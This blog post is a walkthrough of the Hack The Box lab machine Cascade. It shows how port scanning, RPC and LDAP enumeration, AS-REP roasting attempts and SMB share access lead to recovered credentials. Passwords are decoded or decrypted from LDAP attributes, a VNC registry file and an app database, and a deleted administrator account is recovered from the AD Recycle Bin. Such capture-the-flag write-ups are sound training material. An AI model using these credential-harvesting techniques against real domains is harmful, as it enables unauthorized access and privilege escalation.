This post documents the complete walkthrough of Cascade, a retired vulnerable VM created by VbScrub, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.

On this post

Background

Cascade is a retired vulnerable VM from Hack The Box.

Information Gathering

Let’s start with a masscan probe to establish the open ports in the host.

# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.182 --rate=500

Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-03-29 10:16:44 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 636/tcp on 10.10.10.182
Discovered open port 49154/tcp on 10.10.10.182
Discovered open port 3269/tcp on 10.10.10.182
Discovered open port 53/tcp on 10.10.10.182
Discovered open port 389/tcp on 10.10.10.182
Discovered open port 139/tcp on 10.10.10.182
Discovered open port 88/tcp on 10.10.10.182
Discovered open port 49155/tcp on 10.10.10.182
Discovered open port 135/tcp on 10.10.10.182
Discovered open port 49173/tcp on 10.10.10.182
Discovered open port 49158/tcp on 10.10.10.182
Discovered open port 445/tcp on 10.10.10.182
Discovered open port 3268/tcp on 10.10.10.182
Discovered open port 53/udp on 10.10.10.182
Discovered open port 49157/tcp on 10.10.10.182
Discovered open port 5985/tcp on 10.10.10.182

The list of open ports resembles that of a Windows machine. Let’s do one better with nmap scanning the discovered ports to establish their services.

# nmap -n -v -Pn -p53,88,135,139,389,445,636,3268,3269,5985,49154,49155,49157,49158,49173 -A --reason 10.10.10.182 -oN nmap.txt
...
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2020-03-29 10:22:45Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49154/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49155/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49157/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49173/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC

Looks like we have a Windows Active Directory server. :wink:

RPC Enumeration

Since RPC is available, let’s see what the good ol’ rpcclient reveals.

# rpcclient -U% -c enumdomusers 10.10.10.182
user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]

Cool. We have a list of users. Now, we are going for the low hanging fruit: TGTs for users with the “Do not require Kerberos pre-authentication” set.

# for user in $(cat usernames.txt); do python3 GetNPUsers.py -no-pass -dc-ip 10.10.10.182 "cascade/$user"; done
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for CascGuest
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for arksvc
[-] User arksvc doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for s.smith
[-] User s.smith doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for r.thompson
[-] User r.thompson doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for util
[-] User util doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for j.wakefield
[-] User j.wakefield doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for s.hickson
[-] User s.hickson doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for j.goodhand
[-] User j.goodhand doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for a.turnbull
[-] User a.turnbull doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for e.crowe
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for b.hanson
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for d.burman
[-] User d.burman doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for BackupSvc
[-] User BackupSvc doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for j.allen
[-] User j.allen doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for i.croft
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)

Hmm. No easy path in. Don’t worry, let’s check the domain password policy.

# rpcclient -U% -c getdompwinfo 10.10.10.182
min_password_length: 5
password_properties: 0x00000000

OK. Looks like we have a simple password policy. What else can we find?

Lightweight Directory Access Protocol (LDAP) Enumeration

Truth be told, one can actually use the Lightweight Directory Access Protocol (LDAP) to talk to Active Directory. Let’s see what can we glean with ldapsearch.

# ldapsearch -h 10.10.10.182 -x -b "dc=cascade,dc=local"
...
# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ryan Thompson
sn: Thompson
givenName: Ryan
distinguishedName: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109193126.0Z
whenChanged: 20200323112031.0Z
displayName: Ryan Thompson
uSNCreated: 24610
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
uSNChanged: 295010
name: Ryan Thompson
objectGUID:: LfpD6qngUkupEy9bFXBBjA==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132299650192994271
lastLogoff: 0
lastLogon: 132299662254155455
pwdLastSet: 132230718862636251
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFVQQAAA==
accountExpires: 9223372036854775807
logonCount: 2
sAMAccountName: r.thompson
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200126183918.0Z
dSCorePropagationData: 20200119174753.0Z
dSCorePropagationData: 20200119174719.0Z
dSCorePropagationData: 20200119174508.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 132294360317419816
msDS-SupportedEncryptionTypes: 0
cascadeLegacyPwd: clk0bjVldmE=

Looks like someone is using an old password! The password can be decoded like so.

# echo -n clk0bjVldmE= | base64 -d; echo
rY4n5eva

Let’s see what else can we enumerate now that we have credential (r.thompson:rY4n5eva).

SMB Enumeration

I’ve heard so many good things about CrackMapExec (CME) but never had the chance to use it. Now is a wonderful opportunity.

We have a share! Time to mount the share and enumerate further to our hearts’ content. To mount a SMB share in Linux, we can use the command mount like so.

# mkdir Data; mount -t cifs -o rw,username=r.thompson,password=rY4n5eva //10.10.10.182/Data ./Data
# ls -laR Data/
Data/:
total 8
drwxr-xr-x 2 root root 4096 Jan 27 03:27 .
drwxr-xr-x 3 root root 4096 Mar 29 16:11 ..
drwxr-xr-x 2 root root    0 Jan 13 01:45 Contractors
drwxr-xr-x 2 root root    0 Jan 13 01:45 Finance
drwxr-xr-x 2 root root    0 Jan 28 18:04 IT
drwxr-xr-x 2 root root    0 Jan 13 01:45 Production
drwxr-xr-x 2 root root    0 Jan 13 01:45 Temps

Data/Contractors:
ls: reading directory 'Data/Contractors': Permission denied
total 0

Data/Finance:
ls: reading directory 'Data/Finance': Permission denied
total 0

Data/IT:
total 4
drwxr-xr-x 2 root root    0 Jan 28 18:04  .
drwxr-xr-x 2 root root 4096 Jan 27 03:27  ..
drwxr-xr-x 2 root root    0 Jan 28 18:00 'Email Archives'
drwxr-xr-x 2 root root    0 Jan 28 18:04  LogonAudit
drwxr-xr-x 2 root root    0 Jan 29 00:53  Logs
drwxr-xr-x 2 root root    0 Jan 28 22:06  Temp

'Data/IT/Email Archives':
total 4
drwxr-xr-x 2 root root    0 Jan 28 18:00 .
drwxr-xr-x 2 root root    0 Jan 28 18:04 ..
-rwxr-xr-x 1 root root 2522 Jan 28 18:00 Meeting_Notes_June_2018.html

Data/IT/LogonAudit:
total 4
drwxr-xr-x 2 root root    0 Jan 28 18:04 .
drwxr-xr-x 2 root root 4096 Jan 28 18:04 ..

Data/IT/Logs:
total 8
drwxr-xr-x 2 root root 4096 Jan 29 00:53  .
drwxr-xr-x 2 root root 4096 Jan 28 18:04  ..
drwxr-xr-x 2 root root    0 Jan 10 16:33 'Ark AD Recycle Bin'
drwxr-xr-x 2 root root    0 Jan 29 00:56  DCs

'Data/IT/Logs/Ark AD Recycle Bin':
total 8
drwxr-xr-x 2 root root    0 Jan 10 16:33 .
drwxr-xr-x 2 root root 4096 Jan 29 00:53 ..
-rwxr-xr-x 1 root root 1303 Jan 29 01:19 ArkAdRecycleBin.log

Data/IT/Logs/DCs:
total 12
drwxr-xr-x 2 root root    0 Jan 29 00:56 .
drwxr-xr-x 2 root root 4096 Jan 29 00:53 ..
-rwxr-xr-x 1 root root 5967 Jan 10 16:17 dcdiag.log

Data/IT/Temp:
total 4
drwxr-xr-x 2 root root    0 Jan 28 22:06 .
drwxr-xr-x 2 root root 4096 Jan 28 18:04 ..
drwxr-xr-x 2 root root    0 Jan 28 22:06 r.thompson
drwxr-xr-x 2 root root    0 Jan 28 20:00 s.smith

Data/IT/Temp/r.thompson:
total 0
drwxr-xr-x 2 root root 0 Jan 28 22:06 .
drwxr-xr-x 2 root root 0 Jan 28 22:06 ..

Data/IT/Temp/s.smith:
total 4
drwxr-xr-x 2 root root    0 Jan 28 20:00  .
drwxr-xr-x 2 root root    0 Jan 28 22:06  ..
-rwxr-xr-x 1 root root 2680 Jan 28 19:27 'VNC Install.reg'

Data/Production:
ls: reading directory 'Data/Production': Permission denied
total 0

Data/Temps:
ls: reading directory 'Data/Temps': Permission denied
total 0

I wonder what’s in these files?

Meeting_Notes_June_2018.html

ArkAdRecycleBin.log
1/10/2018 15:43	[MAIN_THREAD]	** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
1/10/2018 15:43	[MAIN_THREAD]	Validating settings...
1/10/2018 15:43	[MAIN_THREAD]	Error: Access is denied
1/10/2018 15:43	[MAIN_THREAD]	Exiting with error code 5
2/10/2018 15:56	[MAIN_THREAD]	** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
2/10/2018 15:56	[MAIN_THREAD]	Validating settings...
2/10/2018 15:56	[MAIN_THREAD]	Running as user CASCADE\ArkSvc
2/10/2018 15:56	[MAIN_THREAD]	Moving object to AD recycle bin CN=Test,OU=Users,OU=UK,DC=cascade,DC=local
2/10/2018 15:56	[MAIN_THREAD]	Successfully moved object. New location CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
2/10/2018 15:56	[MAIN_THREAD]	Exiting with error code 0
8/12/2018 12:22	[MAIN_THREAD]	** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
8/12/2018 12:22	[MAIN_THREAD]	Validating settings...
8/12/2018 12:22	[MAIN_THREAD]	Running as user CASCADE\ArkSvc
8/12/2018 12:22	[MAIN_THREAD]	Moving object to AD recycle bin CN=TempAdmin,OU=Users,OU=UK,DC=cascade,DC=local
8/12/2018 12:22	[MAIN_THREAD]	Successfully moved object. New location CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
8/12/2018 12:22	[MAIN_THREAD]	Exiting with error code 0

Nothing interesting with dcdiag.log so I’ll skip it—it’s a wall of text. :laughing:

Last but not least.

VNC Install.reg
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"DisconnectClients"=dword:00000001
"PollingInterval"=dword:000003e8
"AllowLoopback"=dword:00000000
"VideoRecognitionInterval"=dword:00000bb8
"GrabTransparentWindows"=dword:00000001
"SaveLogToAllUsersPath"=dword:00000000
"RunControlInterface"=dword:00000001
"IdleTimeout"=dword:00000000
"VideoClasses"=""
"VideoRects"=""

What have we here. VNC password??!!

VNC Password Decryption

We can easily reveal the plaintext password with vncpwd even though it’s encrypted.

# echo -n 6b,cf,2a,4b,6e,5a,ca,0f | tr -d ',' | xxd -p -r > s.smith.vnc && ./vncpwd s.smith.vnc
Password: sT333ve2

Low-Privilege Shell

Armed with s.smith’s password, we can use Evil-WinRM to get us a shell. That’s because s.smith is a member of the Remote Management Users group.

Awesome. The file user.txt is at s.smith’s desktop.

Privilege Escalation

During enumeration of s.smith’s account, I notice he can access a hidden share. Recall the LDAP enumeration? There’s actually a foreshadowing of the things to come.

Check this out.

These three files, Audit.db, CascAudit.exe and CascCrypto.dll look interesting. Better copy them to my analysis machine for somes dissection. I’ll leave it as an exercise how to transfer the files over. Hint: nc.exe from Kali Linux.

SQLite 3 and .NET Disassembly

Turns out that Audit.db is a SQLite3 file.

PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE IF NOT EXISTS "Ldap" (
        "Id"    INTEGER PRIMARY KEY AUTOINCREMENT,
        "uname" TEXT,
        "pwd"   TEXT,
        "domain"        TEXT
);
INSERT INTO Ldap VALUES(1,'ArkSvc','BQO5l5Kj9MdErXx6Q6AGOw==','cascade.local');
CREATE TABLE IF NOT EXISTS "Misc" (
        "Id"    INTEGER PRIMARY KEY AUTOINCREMENT,
        "Ext1"  TEXT,
        "Ext2"  TEXT
);
CREATE TABLE IF NOT EXISTS "DeletedUserAudit" (
        "Id"    INTEGER PRIMARY KEY AUTOINCREMENT,
        "Username"      TEXT,
        "Name"  TEXT,
        "DistinguishedName"     TEXT
);
INSERT INTO DeletedUserAudit VALUES(6,'test',replace('Test\nDEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d','\n',char(10)),'CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local');
INSERT INTO DeletedUserAudit VALUES(7,'deleted',replace('deleted guy\nDEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef','\n',char(10)),'CN=deleted guy\0ADEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef,CN=Deleted Objects,DC=cascade,DC=local');
INSERT INTO DeletedUserAudit VALUES(9,'TempAdmin',replace('TempAdmin\nDEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a','\n',char(10)),'CN=TempAdmin\0ADEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a,CN=Deleted Objects,DC=cascade,DC=local');
DELETE FROM sqlite_sequence;
INSERT INTO sqlite_sequence VALUES('Ldap',2);
INSERT INTO sqlite_sequence VALUES('DeletedUserAudit',10);
COMMIT;

Looks like arksvc uses CascAudit.exe to delete users. This appears to corroborate with the ArkAdRecycleBin.log seen previously.

Long story short, CasCrypto.dll has a Crypto class with a DecryptString method that decrypts arksvc’s password.

We have all we need to decrypt the password like so.

# echo -n BQO5l5Kj9MdErXx6Q6AGOw== | base64 -d | openssl enc -aes-128-cbc -d -nosalt -nopad -K $(echo -n c4scadek3y654321 | iconv -t UTF-8 | xxd -p) -iv $(echo -n 1tdyjCbY1Ix49842 | iconv -t UTF-8 | xxd -p); echo
w3lc0meFr31nd

We now have arksvc’s credential (arksvc:w3lc0meFr31nd). arksvc is also a member of the Remote Management Users group. Let’s login with Evil-WinRM.

Sweet.

Active Directory Recycle Bin

The assumption here is that Active Directory Recycle Bin is enabled for this server and that TempAdmin has been deleted and placed in the Active Directory Recycle Bin. We have also previously established the fact that arksvc is a member of the AD Recycle Bin group and should possess the permissions to query deleted objects.

We can search for deleted objects with the Get-ADObject cmdlet like so.

Get-ADObject -Filter 'displayName -eq "TempAdmin"' -SearchBase "CN=Deleted Objects,DC=cascade,DC=local" -IncludeDeleted -Properties * | fl

accountExpires                  : 9223372036854775807
badPasswordTime                 : 0
badPwdCount                     : 0
CanonicalName                   : cascade.local/Deleted Objects/TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd                : YmFDVDNyMWFOMDBkbGVz
CN                              : TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage                        : 0
countryCode                     : 0
Created                         : 1/27/2020 3:23:08 AM
createTimeStamp                 : 1/27/2020 3:23:08 AM
Deleted                         : True
Description                     :
DisplayName                     : TempAdmin
DistinguishedName               : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData           : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName                       : TempAdmin
instanceType                    : 4
isDeleted                       : True
LastKnownParent                 : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff                      : 0
lastLogon                       : 0
logonCount                      : 0
Modified                        : 1/27/2020 3:24:34 AM
modifyTimeStamp                 : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN               : TempAdmin
Name                            : TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  :
ObjectClass                     : user
ObjectGUID                      : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid                       : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID                  : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet                      : 132245689883479503
sAMAccountName                  : TempAdmin
sDRightsEffective               : 0
userAccountControl              : 66048
userPrincipalName               : [email protected]
uSNChanged                      : 237705
uSNCreated                      : 237695
whenChanged                     : 1/27/2020 3:24:34 AM
whenCreated                     : 1/27/2020 3:23:08 AM

Another cacadeLegacyPwd attribute??!! Decode it like so.

# echo -n YmFDVDNyMWFOMDBkbGVz | base64 -d; echo
baCT3r1aN00dles

Recall in the email this is the same password as the administrator password? I sense the end is near…

Indeed. Getting root.txt is one command away.

:dancer: